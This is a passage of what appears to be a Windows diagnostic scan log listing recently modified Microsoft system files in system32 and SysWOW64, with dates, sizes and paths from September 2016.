(Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll 2016-09-29 15:13 - 2016-09-15 10:11 - 04673296 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe 2016-09-29 15:13 - 2016-09-15 10:06 - 01046880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys 2016-09-29 15:13 - 2016-09-15 10:00 - 00554496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdh.dll 2016-09-29 15:13 - 2016-09-15 10:00 - 00518656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ngccredprov.dll 2016-09-29 15:13 - 2016-09-15 10:00 - 00138240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DisplayManager.dll 2016-09-29 15:13 - 2016-09-15 09:58 - 00092672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Background.SystemEventsBroker.dll 2016-09-29 15:13 - 2016-09-15 09:58 - 00059904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.System.UserDeviceAssociation.dll 2016-09-29 15:13 - 2016-09-15 09:57 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SyncSettings.dll 2016-09-29 15:13 - 2016-09-15 09:57 - 00231936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.LockScreen.dll 2016-09-29 15:13 - 2016-09-15 09:56 - 00670208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.PointOfService.dll 2016-09-29 15:13 - 2016-09-15 09:56 - 00257536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DataExchange.dll 2016-09-29 15:13 - 2016-09-15 09:55 - 00575488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\nshwfp.dll 2016-09-29 15:13 - 2016-09-15 09:55 - 00562176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.SmartCards.dll 2016-09-29 15:13 - 2016-09-15 09:55 - 00455168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetworkCollectionAgent.dll 2016-09-29 15:13 - 2016-09-15 09:55 - 00332288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Bluetooth.dll 2016-09-29 15:13 - 2016-09-15 09:55 - 00306176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll 2016-09-29 15:13 - 2016-09-15 09:55 - 00152064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\biwinrt.dll 2016-09-29 15:13 - 2016-09-15 09:54 - 00747520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Ocr.dll 2016-09-29 15:13 - 2016-09-15 09:53 - 00340480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll 2016-09-29 15:13 - 2016-09-15 09:53 - 00284672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.dll 2016-09-29 15:13 - 2016-09-15 09:52 - 01358336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAutomationCore.dll 2016-09-29 15:13 - 2016-09-15 09:52 - 00816640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NaturalLanguage6.dll 2016-09-29 15:13 - 2016-09-15 09:52 - 00525824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintDialogs.dll 2016-09-29 15:13 - 2016-09-15 09:52 - 00285696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptngc.dll 2016-09-29 15:13 - 2016-09-15 09:49 - 00901120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Bluetooth.dll 2016-09-29 15:13 - 2016-09-15 09:49 - 00653312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.AccountsControl.dll 2016-09-29 15:13 - 2016-09-15 09:48 - 01321472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_fs.dll 2016-09-29 15:13 - 2016-09-15 09:48 - 01112576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_health.dll 2016-09-29 15:13 - 2016-09-15 09:47 - 01077760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Editing.dll 2016-09-29 15:13 - 2016-09-15 09:47 - 00134656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Energy.dll 2016-09-29 15:13 - 2016-09-15 09:46 - 03305984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll 2016-09-29 15:13 - 2016-09-15 09:45 - 02642944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll 2016-09-29 15:13 - 2016-09-15 09:45 - 00248832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dlnashext.dll 2016-09-29 15:13 - 2016-09-15 09:44 - 00209920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSAC3ENC.DLL 2016-09-29 15:13 - 2016-09-15 09:43 - 00271872 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfksproxy.dll 2016-09-29 15:13 - 2016-09-15 09:42 - 01220608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Audio.dll 2016-09-29 15:13 - 2016-09-15 09:42 - 00719872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_sr.dll 2016-09-29 15:13 - 2016-09-15 09:42 - 00492544 _____ (Microsoft Corporation) C:\WINDOWS\system32\nltest.exe 2016-09-29 15:13 - 2016-09-15 09:42 - 00051712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\winhvr.sys 2016-09-29 15:13 - 2016-09-15 09:41 - 00259072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Family.SyncEngine.dll 2016-09-29 15:13 - 2016-09-15 09:41 - 00185344 _____ (Microsoft Corporation) C:\WINDOWS\system32\DisplayManager.dll 2016-09-29 15:13 - 2016-09-15 09:41 - 00156160 _____ (Microsoft Corporation) C:\WINDOWS\system32\Family.Client.dll 2016-09-29 15:13 - 2016-09-15 09:41 - 00108032 _____ (Microsoft Corporation) C:\WINDOWS\system32\Family.Authentication.dll 2016-09-29 15:13 - 2016-09-15 09:40 - 02026496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl 2016-09-29 15:13 - 2016-09-15 09:40 - 01988096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll 2016-09-29 15:13 - 2016-09-15 09:40 - 00249856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BthLEEnum.sys 2016-09-29 15:13 - 2016-09-15 09:40 - 00140800 _____ (Microsoft Corporation) C:\WINDOWS\system32\RMapi.dll 2016-09-29 15:13 - 2016-09-15 09:40 - 00092672 _____ (Microsoft Corporation) C:\WINDOWS\system32\BthRadioMedia.dll 2016-09-29 15:13 - 2016-09-15 09:40 - 00082432 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.System.UserDeviceAssociation.dll 2016-09-29 15:13 - 2016-09-15 09:39 - 00827904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.appcore.dll 2016-09-29 15:13 - 2016-09-15 09:39 - 00408576 _____ (Microsoft Corporation) C:\WINDOWS\system32\NgcCtnr.dll 2016-09-29 15:13 - 2016-09-15 09:39 - 00368640 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneBackupHandler.dll 2016-09-29 15:13 - 2016-09-15 09:39 - 00322048 _____ (Microsoft Corporation) C:\WINDOWS\system32\PsmServiceExtHost.dll 2016-09-29 15:13 - 2016-09-15 09:39 - 00234496 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Flights.dll 2016-09-29 15:13 - 2016-09-15 09:38 - 00691200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll 2016-09-29 15:13 - 2016-09-15 09:38 - 00671232 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkCollectionAgent.dll 2016-09-29 15:13 - 2016-09-15 09:38 - 00573952 _____ (Microsoft Corporation) C:\WINDOWS\system32\NgcCtnrGidsHandler.dll 2016-09-29 15:13 - 2016-09-15 09:38 - 00505856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.WiFiDirect.dll 2016-09-29 15:13 - 2016-09-15 09:38 - 00343552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.SmartCards.Phone.dll 2016-09-29 15:13 - 2016-09-15 09:38 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\provops.dll 2016-09-29 15:13 - 2016-09-15 09:38 - 00171520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.SerialCommunication.dll 2016-09-29 15:13 - 2016-09-15 09:38 - 00125952 _____ (Microsoft Corporation) C:\WINDOWS\system32\appinfo.dll 2016-09-29 15:13 - 2016-09-15 09:37 - 00690176 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll 2016-09-29 15:13 - 2016-09-15 09:37 - 00568320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.LowLevel.dll 2016-09-29 15:13 - 2016-09-15 09:37 - 00279552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.HumanInterfaceDevice.dll 2016-09-29 15:13 - 2016-09-15 09:36 - 00686592 _____ (Microsoft Corporation) C:\WINDOWS\system32\dsregcmd.exe 2016-09-29 15:13 - 2016-09-15 09:36 - 00648192 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll 2016-09-29 15:13 - 2016-09-15 09:36 - 00640000 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngccredprov.dll 2016-09-29 15:13 - 2016-09-15 09:36 - 00407552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Management.dll 2016-09-29 15:13 - 2016-09-15 09:36 - 00310784 _____ (Microsoft Corporation) C:\WINDOWS\system32\SyncSettings.dll 2016-09-29 15:13 - 2016-09-15 09:36 - 00216576 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapibase.dll 2016-09-29 15:13 - 2016-09-15 09:36 - 00125952 _____ (Microsoft Corporation) C:\WINDOWS\system32\setupugc.exe 2016-09-29 15:13 - 2016-09-15 09:35 - 00280064 _____ (Microsoft Corporation) C:\WINDOWS\system32\DataExchange.dll 2016-09-29 15:13 - 2016-09-15 09:35 - 00168960 _____ (Microsoft Corporation) C:\WINDOWS\system32\easwrt.dll 2016-09-29 15:13 - 2016-09-15 09:34 - 00441856 _____ (Microsoft Corporation) C:\WINDOWS\system32\AccountsRt.dll 2016-09-29 15:13 - 2016-09-15 09:34 - 00437248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Usb.dll 2016-09-29 15:13 - 2016-09-15 09:34 - 00284160 _____ (Microsoft Corporation) C:\WINDOWS\system32\AboveLockAppHost.dll 2016-09-29 15:13 - 2016-09-15 09:33 - 03753984 _____ (Microsoft Corporation) C:\WINDOWS\system32\bootux.dll 2016-09-29 15:13 - 2016-09-15 09:33 - 01004032 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll 2016-09-29 15:13 - 2016-09-15 09:33 - 00963584 _____ (Microsoft Corporation) C:\WINDOWS\system32\WebcamUi.dll 2016-09-29 15:13 - 2016-09-15 09:33 - 00512000 _____ (Microsoft Corporation) C:\WINDOWS\system32\mprapi.dll 2016-09-29 15:13 - 2016-09-15 09:32 - 02716672 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmSvc.dll 2016-09-29 15:13 - 2016-09-15 09:32 - 00634368 _____ (Microsoft Corporation) C:\WINDOWS\system32\StructuredQuery.dll 2016-09-29 15:13 - 2016-09-15 09:31 - 01053184 _____ (Microsoft Corporation) C:\WINDOWS\system32\qmgr.dll 2016-09-29 15:13 - 2016-09-15 09:31 - 00032256 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSManHTTPConfig.exe 2016-09-29 15:13 - 2016-09-15 09:30 - 01639424 _____ (Microsoft Corporation) C:\WINDOWS\system32\comsvcs.dll 2016-09-29 15:13 - 2016-09-15 09:29 - 00720896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.BackgroundMediaPlayback.dll 2016-09-29 15:13 - 2016-09-15 09:29 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\system32\RelPost.exe 2016-09-29 15:13 - 2016-09-15 09:28 - 03288064 _____ (Microsoft Corporation) C:\WINDOWS\system32\mispace.dll 2016-09-29 15:13 - 2016-09-15 09:28 - 00864256 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll 2016-09-29 15:13 - 2016-09-15 09:28 - 00718848 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Playback.BackgroundMediaPlayer.dll 2016-09-29 15:13 - 2016-09-15 09:27 - 02860032 _____ (Microsoft Corporation) C:\WINDOWS\system32\storagewmi.dll 2016-09-29 15:13 - 2016-09-15 09:27 - 00942080 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll 2016-09-29 15:13 - 2016-09-15 09:27 - 00702976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Playback.MediaPlayer.dll 2016-09-29 15:13 - 2016-09-15 09:26 - 00501248 _____ (Microsoft Corporation) C:\WINDOWS\system32\imapi2.dll 2016-09-29 15:13 - 2016-09-15 09:25 - 00628736 _____ (Microsoft Corporation) C:\WINDOWS\system32\uReFS.dll 2016-09-29 15:13 - 2016-09-15 09:25 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\system32\BackgroundMediaPolicy.dll 2016-09-29 15:13 - 2016-09-15 09:23 - 04474368 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll 2016-09-29 15:13 - 2016-09-15 09:23 - 01361408 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll 2016-09-29 15:13 - 2016-09-15 09:23 - 01020928 _____ (Microsoft Corporation) C:\WINDOWS\system32\usermgr.dll 2016-09-29 15:13 - 2016-09-15 09:23 - 00611328 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Graphics.Printing.dll 2016-09-29 15:13 - 2016-09-15 09:23 - 00347648 _____ (Microsoft Corporation) C:\WINDOWS\system32\rascustom.dll 2016-09-29 15:13 - 2016-09-15 09:22 - 05611008 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1.dll 2016-09-29 15:13 - 2016-09-15 09:22 - 01709056 _____ (Microsoft Corporation) C:\WINDOWS\system32\wevtsvc.dll 2016-09-29 15:13 - 2016-09-15 09:22 - 01643008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Speech.dll 2016-09-29 15:13 - 2016-09-15 09:22 - 00770560 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll 2016-09-29 15:13 - 2016-09-15 09:22 - 00376832 _____ (Microsoft Corporation) C:\WINDOWS\system32\CryptoWinRT.dll 2016-09-29 15:13 - 2016-09-15 09:21 - 00971264 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.appcore.dll 2016-09-29 15:13 - 2016-09-15 09:20 - 02424320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Perception.dll 2016-09-29 15:13 - 2016-09-15 09:20 - 02095616 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl 2016-09-29 15:13 - 2016-09-15 09:20 - 01710080 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAutomationCore.dll 2016-09-29 15:13 - 2016-09-15 09:20 - 01275392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Bluetooth.dll 2016-09-29 15:13 - 2016-09-15 09:19 - 03202048 _____ (Microsoft Corporation) C:\WINDOWS\system32\msftedit.dll 2016-09-29 15:13 - 2016-09-15 09:19 - 00730112 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll 2016-09-29 15:13 - 2016-09-15 09:18 - 01369088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Phone.dll 2016-09-29 15:13 - 2016-09-15 09:18 - 00455168 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmenrollengine.dll 2016-09-29 15:13 - 2016-09-15 09:17 - 00180224 _____ (Microsoft Corporation) C:\WINDOWS\system32\enrollmentapi.dll 2016-09-29 15:13 - 2016-09-15 09:16 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\system32\spaceman.exe 2016-09-29 15:13 - 2016-08-05 20:34 - 00023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\smphost.dll 2016-09-29 15:13 - 2016-08-05 01:29 - 00568832 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Speech.UXRes.dll 2016-09-29 15:12 - 2016-09-15 10:37 - 00590960 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll 2016-09-29 15:12 - 2016-09-15 10:37 - 00496872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dnsapi.dll 2016-09-29 15:12 - 2016-09-15 10:29 - 00424640 _____ (Microsoft Corporation) C:\WINDOWS\system32\ws2_32.dll 2016-09-29 15:12 - 2016-09-15 10:29 - 00169056 _____ (Microsoft Corporation) C:\WINDOWS\system32\skci.dll 2016-09-29 15:12 - 2016-09-15 10:29 - 00074080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vpci.sys 2016-09-29 15:12 - 2016-09-15 10:27 - 01883784 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll 2016-09-29 15:12 - 2016-09-15 10:27 - 00128352 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\partmgr.sys 2016-09-29 15:12 - 2016-09-15 10:25 - 00340320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll 2016-09-29 15:12 - 2016-09-15 10:25 - 00280472 _____ (Microsoft Corporation) C:\WINDOWS\system32\bdeunlock.exe 2016-09-29 15:12 - 2016-09-15 10:22 - 00433832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWanAPI.dll 2016-09-29 15:12 - 2016-09-15 10:21 - 00272720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wintrust.dll 2016-09-29 15:12 - 2016-09-15 10:18 - 06654616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll 2016-09-29 15:12 - 2016-09-15 10:15 - 00557408 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\spaceport.sys 2016-09-29 15:12 - 2016-09-15 10:15 - 00335712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pci.sys 2016-09-29 15:12 - 2016-09-15 10:14 - 01415752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll 2016-09-29 15:12 - 2016-09-15 10:14 - 00947552 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.efi 2016-09-29 15:12 - 2016-09-15 10:14 - 00811872 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.exe 2016-09-29 15:12 - 2016-09-15 10:14 - 00435040 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rdbss.sys 2016-09-29 15:12 - 2016-09-15 10:12 - 01472536 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfplat.dll 2016-09-29 15:12 - 2016-09-15 10:11 - 01990640 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll 2016-09-29 15:12 - 2016-09-15 10:11 - 01300600 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmpeg2srcsnk.dll 2016-09-29 15:12 - 2016-09-15 10:11 - 01066104 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll 2016-09-29 15:12 - 2016-09-15 10:11 - 00862064 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfreadwrite.dll 2016-09-29 15:12 - 2016-09-15 10:11 - 00725664 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVideoDSP.dll 2016-09-29 15:12 - 2016-09-15 10:11 - 00160096 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostBroker.dll 2016-09-29 15:12 - 2016-09-15 10:08 - 05683712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll 2016-09-29 15:12 - 2016-09-15 10:07 - 01572768 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll 2016-09-29 15:12 - 2016-09-15 10:07 - 01418304 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll 2016-09-29 15:12 - 2016-09-15 10:07 - 00128864 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmapi.dll 2016-09-29 15:12 - 2016-09-15 10:06 - 00372440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.MediaControl.dll 2016-09-29 15:12 - 2016-09-15 10:01 - 00141824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Radios.dll 2016-09-29 15:12 - 2016-09-15 09:59 - 00255488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\unimdm.tsp 2016-09-29 15:12 - 2016-09-15 09:59 - 00136192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinRtTracing.dll 2016-09-29 15:12 - 2016-09-15 09:58 - 00291840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Search.ProtocolHandler.MAPI2.dll 2016-09-29 15:12 - 2016-09-15 09:58 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\credprovhost.dll 2016-09-29 15:12 - 2016-09-15 09:58 - 00142336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.WiFi.dll 2016-09-29 15:12 - 2016-09-15 09:58 - 00129024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.SerialCommunication.dll 2016-09-29 15:12 - 2016-09-15 09:57 - 00392192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Gaming.Input.dll 2016-09-29 15:12 - 2016-09-15 09:57 - 00315904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Gaming.XboxLive.Storage.dll 2016-09-29 15:12 - 2016-09-15 09:57 - 00171520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ClipboardServer.dll 2016-09-29 15:12 - 2016-09-15 09:56 - 01300480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll 2016-09-29 15:12 - 2016-09-15 09:56 - 00609280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Import.dll 2016-09-29 15:12 - 2016-09-15 09:56 - 00298496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Management.dll 2016-09-29 15:12 - 2016-09-15 09:56 - 00115712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Core.dll 2016-09-29 15:12 - 2016-09-15 09:55 - 00386048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.WiFiDirect.dll 2016-09-29 15:12 - 2016-09-15 09:55 - 00325120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleacc.dll 2016-09-29 15:12 - 2016-09-15 09:55 - 00218624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WwaApi.dll 2016-09-29 15:12 - 2016-09-15 09:55 - 00185856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.Identity.Provider.dll 2016-09-29 15:12 - 2016-09-15 09:55 - 00114176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\setupugc.exe 2016-09-29 15:12 - 2016-09-15 09:54 - 00391168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CredProvDataModel.dll 2016-09-29 15:12 - 2016-09-15 09:54 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Picker.dll 2016-09-29 15:12 - 2016-09-15 09:53 - 00819200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppContracts.dll 2016-09-29 15:12 - 2016-09-15 09:52 - 00500224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Graphics.Printing.dll 2016-09-29 15:12 - 2016-09-15 09:52 - 00445952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mprapi.dll 2016-09-29 15:12 - 2016-09-15 09:52 - 00297472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchProtocolHost.exe 2016-09-29 15:12 - 2016-09-15 09:51 - 00762368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mprddm.dll 2016-09-29 15:12 - 2016-09-15 09:50 - 00071168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\pwrshplugin.dll 2016-09-29 15:12 - 2016-09-15 09:49 - 00468992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.InkControls.dll 2016-09-29 15:12 - 2016-09-15 09:48 - 01320448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comsvcs.dll 2016-09-29 15:12 - 2016-09-15 09:46 - 00795648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MiracastReceiver.dll 2016-09-29 15:12 - 2016-09-15 09:46 - 00471552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.BackgroundMediaPlayback.dll 2016-09-29 15:12 - 2016-09-15 09:46 - 00343040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToDevice.dll 2016-09-29 15:12 - 2016-09-15 09:45 - 02749440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mispace.dll 2016-09-29 15:12 - 2016-09-15 09:45 - 00470016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Playback.BackgroundMediaPlayer.dll 2016-09-29 15:12 - 2016-09-15 09:44 - 02153984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\storagewmi.dll 2016-09-29 15:12 - 2016-09-15 09:44 - 00459776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Playback.MediaPlayer.dll 2016-09-29 15:12 - 2016-09-15 09:44 - 00118784 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll 2016-09-29 15:12 - 2016-09-15 09:43 - 03520512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\xpsrchvw.exe 2016-09-29 15:12 - 2016-09-15 09:43 - 03196416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cdp.dll 2016-09-29 15:12 - 2016-09-15 09:43 - 00220672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToReceiver.dll 2016-09-29 15:12 - 2016-09-15 09:43 - 00090112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll 2016-09-29 15:12 - 2016-09-15 09:43 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\odbcconf.dll 2016-09-29 15:12 - 2016-09-15 09:42 - 00049664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BackgroundMediaPolicy.dll 2016-09-29 15:12 - 2016-09-15 09:41 - 00400384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToManager.dll 2016-09-29 15:12 - 2016-09-15 09:41 - 00357376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Geolocation.dll 2016-09-29 15:12 - 2016-09-15 09:41 - 00295424 _____ (Microsoft Corporation) C:\WINDOWS\system32\unimdm.tsp 2016-09-29 15:12 - 2016-09-15 09:40 - 02138112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll 2016-09-29 15:12 - 2016-09-15 09:40 - 01656320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Perception.dll 2016-09-29 15:12 - 2016-09-15 09:40 - 01247232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Globalization.dll 2016-09-29 15:12 - 2016-09-15 09:40 - 00467968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.XboxLive.Storage.dll 2016-09-29 15:12 - 2016-09-15 09:40 - 00395264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dmenrollengine.dll 2016-09-29 15:12 - 2016-09-15 09:40 - 00114688 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Background.SystemEventsBroker.dll 2016-09-29 15:12 - 2016-09-15 09:40 - 00094720 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll 2016-09-29 15:12 - 2016-09-15 09:39 - 01232384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Maps.dll 2016-09-29 15:12 - 2016-09-15 09:39 - 01170944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Phone.dll 2016-09-29 15:12 - 2016-09-15 09:39 - 01004544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Input.Inking.dll 2016-09-29 15:12 - 2016-09-15 09:38 - 00773120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchIndexer.exe 2016-09-29 15:12 - 2016-09-15 09:38 - 00620544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll 2016-09-29 15:12 - 2016-09-15 09:38 - 00427008 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmrdvcore.dll 2016-09-29 15:12 - 2016-09-15 09:38 - 00349696 _____ (Microsoft Corporation) C:\WINDOWS\system32\icsvcext.dll 2016-09-29 15:12 - 